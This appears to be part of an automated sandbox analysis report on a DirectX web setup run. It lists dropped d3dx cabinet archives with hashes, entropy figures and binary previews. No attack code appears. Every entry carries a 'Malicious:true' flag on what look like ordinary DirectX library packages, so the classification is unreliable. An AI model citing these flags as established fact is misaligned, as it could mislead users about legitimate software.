                                                                                              SHA-512:D0CF0E3AAD9C8C43A927D1BBBD253B9FE4C97B638AD9A56F671EBEDA68FC9BC17CC980D93095FBB248DD61DC11B7E46C22D72CEE848B150F7A13EAD9E08A7891
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............t.....9.......e8....d3dx9_37.dll.<'....9...e8I...d3dx9_37_x86.cat.....D.9...e8....d3dx9_37_x86.inf.,...O.9...e8....d3dx9_37_x86_xp.inf.\...{.9...e8....Mar2008_d3dx9_37_x86.inf..$.0:..[.... 92......$Q.f...>J...h.].W...uWL.I...W]J.X..V..{..Z........X.G{<..033.4..P..........ek |.b./..gFB'S...K.....fe.5.u..T<{..H....XG84QbDR.8X.Hf.H..46...H"0 ..HH.S............*.(_ ..w...H.....Q..P..vT.t@.G+...1...YH... V..Y4H..P..1R$l/..20!ls'...;....;..kmttyu...x.s....q.....q$.C..5k....(....B.r..y..<.6...Fz..hn..-.....Q.3Z...@.1.V..S?...a|....(6.......D. ....)Ej....GJ%.5 ........G.w>......p...i}..<.|..b.&!..7E.yU.O-.D......O.UC..yIA.Aj.._..D...VOc....{.f]J.<...r.)o.|-...>.PWF.....;.;..vb....4..QV'f.$......:S.hi...~...}3k......\...}a.......L5..*e....|.....1..n...T...t......[....Z.].e....d.A......'..|.V.2.|Ax..W..........B.>...x.. ..|.`...L.h..H.i.....@-.aa...7...K ...../..l.x....r...0>x..@/X...W..L..

                                                                                              C:\Windows\msdownld.tmp\AS4566A9.tmp\Mar2008_d3dx10_37_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 812300 bytes, 6 files, at 0x44 "d3dx10_37.dll" "D3DCompiler_37.dll", flags 0x4, ID 8943, number 1, extra bytes 20 in head, 58 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):821468
                                                                                              Entropy (8bit):7.9989494569533655
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:k8Yjgk28yEYvDLX3XmZcLHo9yLvTJqnrT+LprnNjjjGM6pdKi814DYnciABrI55V:1Yjp/yEcfLI9y4rORNYdKibxBrIS6
                                                                                              MD5:8234B9B90BCBB5077E1B5FAA0B66D1A9
                                                                                              SHA1:E9207C572FDEC592B7C17A7F9C6F875C8A55B1F0
                                                                                              SHA-256:6A2727269E6CAC7C4D2E316333D29BAC0DC1CD7F51C36C0C08B0388203DEDAD2
                                                                                              SHA-512:74C94A6E092D7C828FC1E3FAEE4B21917AFC3CACEC04F260754190D0533F93A58289763AC620E5A577F7865902023B30548CDA4D9E968C90EE13050AD6D1E8C5
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....e......D................"...........e...#..............:.............E8...d3dx10_37.dll...........e8....D3DCompiler_37.dll.f(..(.....e8K...d3dx10_37_x86.cat.I.........e8....d3dx10_37_x86.inf.i.........e8....d3dx10_37_x86_xp.inf.c...@.....e8....Mar2008_d3dx10_37_x86.inf...-..,..CK..\TU........[fz.,P..0}Q.a.L...T..`.f.;........i..io{n.*...ej.i.Yb........;w....r.....s...9.<g.%f.4.F.q...F.*"_zr.........6.4}..I.8.;o..9L..j.9.43..Z.....M`rl&..A.....n.b..Q.....;..).).MK{J...!...1..T'....:..&...,*O.k\.!}4.d.vH/5.0.....x-!.....{.c..@......Dm53SG.W..A..5..MK..P.?ZK64'd..%.4p......'..v.a-..3!...iYM...Jc.B.i..^.4.;.....b....:..i..'Ui{2.$m.t(w..w...Km..ZrM:..7g.p.w.m$..k..`..n..7JK.`...%..O..d..`....@2h.j.s.ZR.V....?..p-i.:../...@.X.&..:RK..y`"p.. ...a..\.@Y..l...<0.lB|6.d...Ac..N..=`.(..@.._.....)...`(....\..|....@.~i..-....z}.........]..'.........<0...d...A.h......e..@...6....,.....D0..A....A8...@K.a..6/.\.&t.$/.V.I.....f.".....t.$.....H..X.6....$

                                                                                              C:\Windows\msdownld.tmp\AS456E3B.tmp\Jun2008_d3dx9_38_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1457918 bytes, 5 files, at 0x44 "d3dx9_38.dll" "d3dx9_38_x86.cat", flags 0x4, ID 7184, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1467086
                                                                                              Entropy (8bit):7.999726422350297
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:HGIly6o6H1kEznWRpKpx5A0SBF/VnjmkC8nAMzh08qF4QH5/RSzsExkqv4Q9hHi0:Hh46Tn/UXVjmiJlO4sVRSzdk5uhCbOka
                                                                                              MD5:E2FB2E37C342983493C776BD81943978
                                                                                              SHA1:2A8F3C45CF979966D4D4D42A4D34F05C72C7E29E
                                                                                              SHA-256:57E57A6348E55AAACA6BED5E27BBDD0A4BD0DDE69C77F4D26C805BE6384BE927
                                                                                              SHA-512:2D297F607C5A098A3D2B19E7F88AA12F720AF3C23FE6DDCE7D4659A9184D1CF8F8A76F35B8ACB639B48CDAD8998C919215A03B89207E2BB1829EA3D8A9EFB95A
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....>......D............................>...#..............v.....:........8wq..d3dx9_38.dll.<'....:....8.r..d3dx9_38_x86.cat.....D.:....8.r..d3dx9_38_x86.inf.,...O.:....8.r..d3dx9_38_x86_xp.inf.\...{.:....8.r..Jun2008_d3dx9_38_x86.inf. .,:..[.... .,......$Q.f...<....B..W...WWRT%.*,..6mZ....k.!H}_.aAkk..C..............Z...1.5.!....S.-.Uy....# ...g....3...q.u.N..Nz.2Zq..D..+r."S9..ZT$.QD...UM..4......P....@...f.h...}..l7.{l.e7..#.b.$_...Q_...#......CC@)@......@......1...`....D.$m....wgg...B...n..E..{x,u.{.VK.;:.7.M$IO3v.u..v.p.%...N.X/.:Q..E...(/n..%Y...."..X.)}U.5...9F\.C>.....9..L.1.T.....4I.$R...5.L'.e.H.`.....H.._....9...XQS....r..>H.Gw..I.}.I...S.M.#Q....a[.....C.o...HR6|..#....Ccu.^....=...f.N..LH.nMzk.k.....k..V..S..^.^,BdOQ.E..^.q..y.z.A{x..g8....i.....l.....f...a,..\xzC...r.@...C~....\.....!8..)....ZU ..%.e.xG..<.i.*....yVH.AA......M.F....Ph..,.Uap.....9...-...v.V.... |..*......X...6....P...,.K.O.Qe...).]`..C..............,..+.q.........w...

                                                                                              C:\Windows\msdownld.tmp\AS4577C0.tmp\Jun2008_d3dx10_38_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 843959 bytes, 6 files, at 0x44 "d3dx10_38.dll" "D3DCompiler_38.dll", flags 0x4, ID 8962, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):853127
                                                                                              Entropy (8bit):7.998980130768887
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:IKcIh4DqtGLRndZKm4zZTQb4BJ+gfG07QyGeZH:IKc64DgG9dIZTQb4L+GGIGeZH
                                                                                              MD5:B0E2B612DAF28B145B197A4DB0A9B721
                                                                                              SHA1:F69266E4AF3D2DE31A2A2E416F10B0F44737739A
                                                                                              SHA-256:E8DC1063C9434EED8D633741B19CDFA1889581041E2214B87B5159E3EA087F3C
                                                                                              SHA-512:6E31F18CB75CE69D291D0ABD15EDADF02C0693033351DFB2F435312A47540AA223C8176209725C14A05FA6494153A3E191B2FB7CB8C5CEE11FB42371CE67392B
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................#...............#..............=....$.........8wq..d3dx10_38.dll......$.....8wq..D3DCompiler_38.dll.f(..(......8.r..d3dx10_38_x86.cat.I..........8.r..d3dx10_38_x86.inf.i..........8.r..d3dx10_38_x86_xp.inf.c...@......8.r..Jun2008_d3dx10_38_x86.inf...E7%,..CK..\.....\./BS3...$.......p.&..x"........h....J.,5.,._.e....y..-y...#.......YXPP+..y.......y....o*.&..........\....i...YQcs..u.77K.8..h......h..]L...y6.bc..S.\.Y..]..aM.iyo.Xr..2....w...^V.Y.v)..s..w..;..z...........S..WY.b...!....q..W............y.~.x...P..!z.S.....2..{W.x.tJ.....Y....'o5"dE...(...|o.U'.tpJ....8..4.j.vT.+TrVWy.`.P..{![...O.<.!...F...V.........C.k.E.h._..AM..+...E.jG.U.R.F:.].E...Xvw.?....'..,....................A-p...l.[.J....4.. .$.,...`2X.W.c..=Y.>........i.....A-p.?.....`.8..qp.`...A.....P_1.....? ]O....A?P.&........%..c. ..v...,h.=...AK0........k......d..... ....A{....... .|o......&..|......0........d.....[m......X...%C.D.2X.....'&.4..@o......98.~..c

                                                                                              C:\Windows\msdownld.tmp\AS457F71.tmp\Aug2008_d3dx9_39_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1458712 bytes, 5 files, at 0x44 "d3dx9_39.dll" "d3dx9_39_x86.cat", flags 0x4, ID 7173, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1467880
                                                                                              Entropy (8bit):7.999682997096517
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:ztDuVYfr3zZ3dHi+rHI8lVs1WutNXBoY4RbifcKly/kNwSh1mMbS8X/9Wv8PiL:JDnr3zZ31lVsgENSsfcKaZAFF88+
                                                                                              MD5:4379902C4180A9A6BF40B847372CEC5A
                                                                                              SHA1:C7FC8184D5620154B9BFD6FBC8820A78C4EEE592
                                                                                              SHA-256:61E703E8D231412F135B4ABA629122D9CB69AC9EE39FA3CBBE6B95DE05097A8B
                                                                                              SHA-512:9269F49A5CA90143C50B817E9F5AEC0FC4C32BA1B6D3A21CC5448CAD21A16A902540C8CFC1825B124CE39E0BDC479ADE4354B6BE15B2067E3033E04998E0710A
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....B......D............................B...#..............v.....:........8.X..d3dx9_39.dll.<'....:....8.2..d3dx9_39_x86.cat.....D.:....8.2..d3dx9_39_x86.inf.,...O.:....8.2..d3dx9_39_x86_xp.inf.\...{.:....8.2..Aug2008_d3dx9_39_x86.inf....$:..[.... .1......$Q.f...<....B..we..]w.QR..B.).V..i.k..Z........=......d.. .....2..cLfl..A..w4[..VBs.{...^...S..a..]Z...%vh...9..Ro...K..r.}..ZP......".i..5P..."..............."......I.c.on..F...&..K @T.=...C..a ..!..q...Pb.=........hY.b..i`AY..<xwqvlx,t......Yg..R....g1fG..i..4.o.......S_...V..N.K.N..qQ.....Etr.1...E..*:..|..../e..<...9.s.....%.RT. .M!.$(2b[X.NT.B...HT.?.!.<|4~.?........Si.Xe...l}....J.J|LN...R.o..@W!.y.8..t'....%A.!I..U.A>..~........*..u....2SR.[...9Te.?..U....y*.M.yxnx...z.J..V...(.....X.|...f.h.....?.LGt..UT...o.7.0..h[.P..`...`../$LED..'.E. |.A-.w...6.+.\;.h...H...........8...A...0.n....9- p..M. r.V.!...W...r.Y......BO.d...{4.. ....U..A ).....9f.e............`P..w[.......$..o.L1.~.R.M@\AC....W.%..

                                                                                              C:\Windows\msdownld.tmp\AS458925.tmp\Aug2008_d3dx10_39_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 843207 bytes, 6 files, at 0x44 "d3dx10_39.dll" "D3DCompiler_39.dll", flags 0x4, ID 8952, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):852375
                                                                                              Entropy (8bit):7.998886184584254
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:E6Ih4DqlkwAjhr1mB+uYgrCvCZNmJ9ndKo4XYbX:E664DQkwAj/oNCvCZIdN4ID
                                                                                              MD5:5380053AC4C344BD38604022476B1C1D
                                                                                              SHA1:043DC8F49BCA3BF0BD85E858F5C2EEDF68565C0D
                                                                                              SHA-256:84800C55F773D5D6913E344E41BABA58CF07CEC2E6C7114CA3BF48E8F355419F
                                                                                              SHA-512:F3CE2DEF6E2E8A1D2C07F627E3C437A1BBA0B2E456020A84121346472BE3D28E0FC69623BD408F35A2C639C83DD2787F998DEDFE42B7625DC71500824B035FEC
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................"...............#..............=....$.........8 X..d3dx10_39.dll......$.....8.X..D3DCompiler_39.dll.f(..(......8.2..d3dx10_39_x86.cat.I..........8.2..d3dx10_39_x86.inf.i..........8.2..d3dx10_39_x86_xp.inf.c...@......8.2..Aug2008_d3dx10_39_x86.inf.,"..%,..CK..\.....\./.R3...$...Hef.K0..D<....V..uvA4.J.yTx..YjvY..<.2.133.J.[...O.g.Q.J..gf.....r^.}..s~g..3...F..!...eB>$.e .~..Z.j@V....C]..-..-N.!.Dc.c2.lv..!0b......$&.n.....yH..cz./...|...w.;y../+.......l.|~...?...{..-<Us.(n..M.U...(Bz.I.WCc.q.I..uuu....2O.K}.~_x...P..B.D.P.].C-e..O..x.tJ.....Y....'o5%dE...+..../..".tp...Ap..i^.$.0W.....!...b../.W..y.B.....#.m.k}O.k..z...N........W.3.......S.F..].E..j,.;.xe..I`6p.V..._O..K`.H.C....f.....'..3@?@O..`...@&p..P...W..>HO.....,..CA........0...m.....D....0.....x.S...l.....'....`.....%....{....1y.t...Qp.t..{..A.0c.......k.....@!x......RA/.....@c......}...n.......`.x.L.cA...A ...P..S....2}{%".,....d8..^.K..p.xGE...+..\`:X.>.G.o.Y

                                                                                              C:\Windows\msdownld.tmp\AS459098.tmp\Nov2008_d3dx9_40_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1544836 bytes, 5 files, at 0x44 "d3dx9_40.dll" "d3dx9_40_x86.cat", flags 0x4, ID 7155, number 1, extra bytes 20 in head, 134 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1554004
                                                                                              Entropy (8bit):7.999645278979612
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:K3tdQkdeoPJLiej+pb7Q15LwQrpLeWvYMWbPBmcnILz+0Byna:2dvdeAweSBQPLwgpCWvYMQ5mcnIH+m
                                                                                              MD5:75556D89FDD442967A23993C9111D997
                                                                                              SHA1:003DE53653C0CC84F8C3D617D1F76FB475F1A7CB
                                                                                              SHA-256:863AC3438F57158D4F53900C6924BFDC132AB43A5AF57D4658E65842836B4FA1
                                                                                              SHA-512:6086114500DBBF4DB9D0A9C3F72732995BB9A3AB5C135EAD53143749B95651B37B64BE7A52CA09388DE90216FD00486FDFCFBC87D42D77FAC469F82B5290E06D
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................P.B.......O9.2..d3dx9_40.dll.....P.B...O9n:..d3dx9_40_x86.cat.......B...O9h8..d3dx9_40_x86.inf.,.....B...O9h8..d3dx9_40_x86_xp.inf.\.....B...O9h8..Nov2008_d3dx9_40_x86.inf..=.:.:..[.... .2......$Q.f...<....!Z.J.+...*ea..U.q....ha.x.y...........=.h!............X.{.<,.....?..b.):.[J{....^=mv:.i.e..}9s............F.QN.^+.).p...!9.4L..B.k ....F.}..R.. ..D%P4@...'2.$C..EU..:_... ..=.....2...Q...H|..2.hi....H3.*.%JA.O...s.n-..<.<..9;7p.wnxw,||.....du.......)..$3CN.'.)j..|...x.w..>..4.D..."..I.'.=.....$.7..m...J..F....0..F.XD..v....."*|2...A.H.R..b.()! .|..Hh`....Q.K...NH..9../^...|[!.)k...8._C/~D.W..K4.}.B.T.b.Kw..si..6.E.#6w......_.,.>6{r$X&:....s.w......k....h'5......3...0XOG.^.=..j....sFg.jO. t..?.S.l5?.t...s....`...]......'$LJ.........Z]h.. ..h.l.5b....F..0......m.....P.....n....Z.... <..7.@...,`@..#.i.r....... ......@....|....e/.pa...@Q.A..'.EL..7H..?^..C.........]i p..N7....:i.P.........

                                                                                              C:\Windows\msdownld.tmp\AS459A9A.tmp\Nov2008_d3dx10_40_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 959461 bytes, 6 files, at 0x44 "d3dx10_40.dll" "D3DCompiler_40.dll", flags 0x4, ID 8926, number 1, extra bytes 20 in head, 77 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):968629
                                                                                              Entropy (8bit):7.999011847061652
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:JKTxCzc8gSDnU8Hz10a0s65QckarHGlImJtXn+QbtU0sHsqzn:mxCzs29r0WQma69nBbtU0sjzn
                                                                                              MD5:5DFEB46E60795266DA03F2D0A67E7ACD
                                                                                              SHA1:A77758873E5544E8AD22ACF469C4A0FD0C944A88
                                                                                              SHA-256:EC52B075A3E9C7FE468B317E0FF977964B1003D560065128741F4392BF47C49A
                                                                                              SHA-512:6EC058811AC017BE3CD3A46559CD73126666F41B0FA58D92C1168CF2A2E0E2357B19F65531C786EC81A438975DBECE440C5E7B6C653AFA5428CE6C444179AF6C
                                                                                              Malicious:true
                                                                                              Preview:MSCF...........D................"..............#..............M...X.........O9.2..d3dx10_40.dll.`...X.....O9.2..D3DCompiler_40.dll.......%...O9p:..d3dx10_40_x86.cat.I...g.&...O9h8..d3dx10_40_x86.inf.i.....&...O9h8..d3dx10_40_x86_xp.inf.c.... &...O9h8..Nov2008_d3dx10_40_x86.inf....X.0..CK..T...{..J........D...$.....$.2.....&L+...u..Q.5#f...W].9cN...w..Qd...y.......9~.}..]u+tOMM...r.].a.O..f7#.\........m.l._a.[..,4Q.&KU...c.eq1))*.,V!S...)2...Y.*^a.Q..b........y_x.W..Q^J^.j..P..gB.*..<w....E_).$j..q.|y..{.'....1V-..N.bt..%...A.0K....u...O...K.u.F.H(u>.X.vbd.......)..Ltg)c.a..J..|.V).N.F`G.Lxk..Rf.-.<1b...0..y...*y!.g..F1Z.v..T..o......i.............!Jku.:..i...e.....Z.HR.0...6.....zk1..._.-.L....a).Gx.).........@6...........P.\....?`.....f...|.r......L9......S.T ........o:J.'.E`?..x..?...$........z.......,.<.'..D.j .....G...3...G;.......p...&@W...;....^........R .X.....L ............-...........'.r`7........)........=......r..j,e..j.)..........uX)..p.B...

                                                                                              C:\Windows\msdownld.tmp\AS45A25A.tmp\Mar2009_d3dx9_41_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1606486 bytes, 5 files, at 0x44 "d3dx9_41.dll" "d3dx9_41_x86.cat", flags 0x4, ID 7142, number 1, extra bytes 20 in head, 128 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1615654
                                                                                              Entropy (8bit):7.999772423092358
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:xFtN95ew18Yl4WTrZnZSibmmq18Whxp9pWISiIz9cXwowwenm2AB4qDA2mV7Q:newRFZ8ib6T3p9pW9/Z4bM/XkA+
                                                                                              MD5:901567428D8C82756D7BF5A406441BD7
                                                                                              SHA1:6E3C22147F3DA77AC8F20D615CA32B5EF2A0ED28
                                                                                              SHA-256:32356344AEDDF709C9D5302D8F3FCC1FF1BE2E82D8D17833A2086400AF248794
                                                                                              SHA-512:6FD4C429E32480BDFF4E58BA8BC0D28FE97C9FF5EF1FABBB856230EFA669246A354F99B723E7483D548B74C121AC8BA9CBA2B5BC3C18F35EE828302D392CF6ED
                                                                                              Malicious:true
                                                                                              Preview:MSCF....V.......D...........................V....#..................X.?.......i:k{..d3dx9_41.dll.....X.?...p:.r..d3dx9_41_x86.cat.......?...p:.r..d3dx9_41_x86.inf.,.....?...p:.r..d3dx9_41_x86_xp.inf.\.....?...p:.r..Mar2009_d3dx9_41_x86.inf.x..#.9..[.... .3......$Q.f...<...!..vW]....]eJ.*Uaq....a.Zk....}_..=hk..C.=...."......?1<..izt.`Y.._ .....H.`...uI35.:.,L.....I.;...........&...B......I....!@.A...A....a......................#..&.E....J..%. ......!..Q0..P.F......$.!...q..yXf..d....7,v......Y.....Q......EI.&..Rm....d.I....D........WJ...`.u..WK..K........yQo...2...W.U\.C.m...a.k.kpq.U..C.5.Hh).......<R.s.l.+.......);........%.g.g.....i..I.U.).H......l./._...<.C....a....U8.'.,.0GR....=.5....E.......jln..MKiliw..Q......,.2{..k...\.X$.......Q4..??...ns...?*....t.|.8U..>WJ./.>S..Vp.....0...3 ....'!*....,R........Ph..#.t*.7=.?p....D.....hX..H....J.`...Z.......$7t.......a...|S....(..G. ...V+`...,.X.P..lZ`...X>Bt....E*aM..(`..0......BA3..p.%..OE.c``.BU....).P5

                                                                                              C:\Windows\msdownld.tmp\AS45AC2E.tmp\Mar2009_d3dx10_41_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1034785 bytes, 6 files, at 0x44 "d3dx10_41.dll" "D3DCompiler_41.dll", flags 0x4, ID 8914, number 1, extra bytes 20 in head, 71 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1043953
                                                                                              Entropy (8bit):7.998757160305283
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:JAEjuCeK6JgAkPBJoBgsqDP8FbGACV0L/sW0G+vv2:JFuCeVJqyxqDUFb9CV8r
                                                                                              MD5:45E83CBA5710A1DE7D3990A288122E85
                                                                                              SHA1:23C4BFBDDCFB11ACB7C47C409825F039AF7EB908
                                                                                              SHA-256:B7DA29103CDF374DE0C09713CB985035EAC45FB8B394D3B8157D8A7562A89899
                                                                                              SHA-512:8C56D376D349AA00948E1F3C6168DADE76AC9A26ADE1AAC5A385DCF0253602F5A2973483D083425195DB6AD7717494FD3CF674F5549774AC608CEFA2A88BF0A7
                                                                                              Malicious:true
                                                                                              Preview:MSCF....!.......D................"..........!....#..............G...P.........i:k{..d3dx10_41.dll.h-..P.....i:k{..D3DCompiler_41.dll.......#...p:.r..d3dx10_41_x86.cat.I...a4#...p:.r..d3dx10_41_x86.inf.i....7#...p:.r..d3dx10_41_x86_xp.inf.c....:#...p:.r..Mar2009_d3dx10_41_x86.inf.Nn.>.0..CK.wT.I..{.G.C.QQ.#(I.T`..Q.........0.b..5`Xs..bD.@..f1.9..x....Yw..{...s..U...[.kjj.....h3...TV2.nFx92?~=....m.l.[n.[..(81)]..R&..Sd...J.,F!Se..Re..A..e..~}..b.e[.fd.np.+..[......R;.z.....v....N.~...ibx.h.S.....W...7..-.a.8...`...$u..A.0K....j1..g..A.^k1...Pj.]bm.ym..~t...+d..`*..LG}..X...#.J.....;'e.Z.-.2..m.0....[W..#......j.05.Z.R.!..:.jd..e.........O..7:...\....k..bY...s4W).. ..%.......:g............p..Z...... ..<5.2..].... ..X.,..!~.0...v..k.c.1.2..V.10.L.#.R.x.=.S.9.....27.S@.....d.* .p.l.d......}.\...;.e./.0 ...&.~...8.\...:.L;.'....R..."`;p.....>...........BhW6.I&..D.!.3`...M...>u.....S.A......E@...0.P..@8....v.9....X@..."e....'..`c...(...^..R.'p...4....{ ...f...2....h

                                                                                              C:\Windows\msdownld.tmp\AS45B47B.tmp\Aug2009_d3dx9_42_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 722496 bytes, 5 files, at 0x44 "d3dx9_42.dll" "d3dx9_42_x86.cat", flags 0x4, ID 7080, number 1, extra bytes 20 in head, 59 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):731664
                                                                                              Entropy (8bit):7.999475174279291
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:IDTg2rIyRKFAtmsFp1UChyax+LFl9NiHEpMH5Vfe8PIqEqnyA6F56J2:M02fKYVFvhKLFl9NikiH5V28PXyA6GJ2
                                                                                              MD5:9BC8213933598D050827D20A4573486C
                                                                                              SHA1:E6F9BA62756A00C53746419DEA221881AEB336CF
                                                                                              SHA-256:9C96B6FC4DF5C0EFCA9F0D653976772B2B964243214F99066E4CA4AA6DF791DD
                                                                                              SHA-512:A1920D042963CDDA41DF44044DE5B94B4CEE6EFA102F633214E384918D93D2D6A31EB388BDBD00C7E9C199281E3B71CAA5242E9A42E7F0BE27EDF90A3CF6890C
                                                                                              Malicious:true
                                                                                              Preview:MSCF....@.......D...........................@....#..............;...X.........$;....d3dx9_42.dll.....X.....$;...d3dx9_42_x86.cat...........$;...d3dx9_42_x86.inf.,.........$;...d3dx9_42_x86_xp.inf.\.........$;...AUG2009_d3dx9_42_x86.inf.....::..[.... .......5!.P..wO.n..pOc....7...l.c.n..slmk]....]...B..W..D..UJ...P........C.......l8..y^.S.N.I..7%.....].n...d...>.#....zT{6+..X.UB. A*A......u7{0...n. ....d..R....=...D...F.......n..n..~U.]..U.EX, .......A^;...(...<.@#0/..O.!...i.#.C....D...D.cwC.v.y.<+.*..*..g.l....f.k...W...[..I&...M..W.&Z..^..MB...:.LyQv.l.U.=Y..%....8Ls.......-..".U.....s.f.YVvX...-..8T..m...=..9.CN!89....f.2.G.....:s.G...>.......c^.Z..=h.l..Q..w..yc.\i.Z.^...$cw.T.".d`.jhL;.ZqB.L.{...Z....h{=s.....a.4.1../..`....|;I...;...$.m!l'.g..pa.).b0..:.tT...T..{..<..T.....z.....!....,..|.@.../..A.....q.......@.....................|..5...[..p.6....FE.../.609$.....+.Q.f.N3.....L; ..6./.j.4.a*.E2....(G0,...x..5...IBS.._......9.....%0.....

                                                                                              C:\Windows\msdownld.tmp\AS45BBCE.tmp\Aug2009_d3dx10_42_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 186171 bytes, 5 files, at 0x44 "d3dx10_42.dll" "d3dx10_42_x86.cat", flags 0x4, ID 7280, number 1, extra bytes 20 in head, 15 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):195339
                                                                                              Entropy (8bit):7.996178589789764
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:/hxMUzbnbaWbX0JkFvs5aQnkW6sJ/Fw395/lfLxBQLgGlekmQI84HAGujR7j:5CEbiqvs5aQnkW6A/8jlzxBw0/Erd1X
                                                                                              MD5:F264AF5A36B889B4F17EB4D4F9680B4F
                                                                                              SHA1:1DF087EA99D321EC96D0D2F1C66BEE94883D6F08
                                                                                              SHA-256:BB46189EB8CB7769EB7BE00CFBC35902072FA9408313EF53F423E5AE5C728F61
                                                                                              SHA-512:73AE1CF3CAFBA148F4E5B4D8AC12A7AA41F6ECAC86C139C6A7714F90F3DC61C444DC152A3AD3C2CA800C1A1F4955A2B508735F8490666B57D1420FB7A7BFC269
                                                                                              Malicious:true
                                                                                              Preview:MSCF....;.......D...............p...........;....#..................P.........$;....d3dx10_42.dll.....P.....$;...d3dx10_42_x86.cat...........$;...d3dx10_42_x86.inf.(.........$;...d3dx10_42_x86_xp.inf.c.........$;...AUG2009_d3dx10_42_x86.inf.|..f.0..CK..T.I....8*....e0.JVT`..Q......A..a@..i.k..........b.bN......fE.]...y...s._W..~.......9.6.0:../....^.._..F{.3......7.NHL.....T......Z.....Sd.)2W. Y.2Na....^.lk....+......V.J...j.W.vI.Xj.V....Y..^$....&.&....9..azKt..6.*...2..e..).,..6...0,......Z.a...R...k........(..V.E.....2..C....p>r..Y.].sR&....)....i.0.....W..#(.....j.p5.ZvR.!..:.jd..e............7:(..\....kZ..b^...s4W).. L.%......:g......./..5.......eW).....t.2..].... ..X.,.. ~80...v..k.#.1.2.....0..PF.....z.]......\.\.N.E.J`6....p.....@_..;...p.8........x.....y.6.(p.x..XJ..@O........E.v.0p...m4.8.,.6.%...P.lh.. ...B.g..0.....>v.....S.A......E@...0.P..@8....v.9..h....xc*e....'..`..._...........M.lg..P..-.!......L...@$0.........j5..m.{ .H.f.[...C@

                                                                                              C:\Windows\msdownld.tmp\AS45C17B.tmp\Aug2009_d3dx11_42_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 99084 bytes, 5 files, at 0x44 "d3dx11_42.dll" "d3dx11_42_x86.cat", flags 0x4, ID 7285, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):108252
                                                                                              Entropy (8bit):7.991332626956763
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:MI9cI4N24813fwIsfQqzjoroJ1OL79D+0sFGmNjFRchFxLvk5yswFa8D+0qlt6s1:Pah8Vo/1uLJoGmZEFxLvcwM8DZcZxb
                                                                                              MD5:DD47F1E6DC19405F467DD41924267AD0
                                                                                              SHA1:85636EE0C4AF61C44D0B4634D8A25476CF203AE9
                                                                                              SHA-256:39FF69BA9161D376C035D31023D2FDEECB9148A2439ABE3AFD8F608F7E05E09B
                                                                                              SHA-512:F77C4CEF5CB7E927948F75C23A190E73D6C75B4F55915859046533A10AA3C5ABAC77D8BEF71A79368C499C85009213E542094B85B94B69E62AA66B60616777C3
                                                                                              Malicious:true
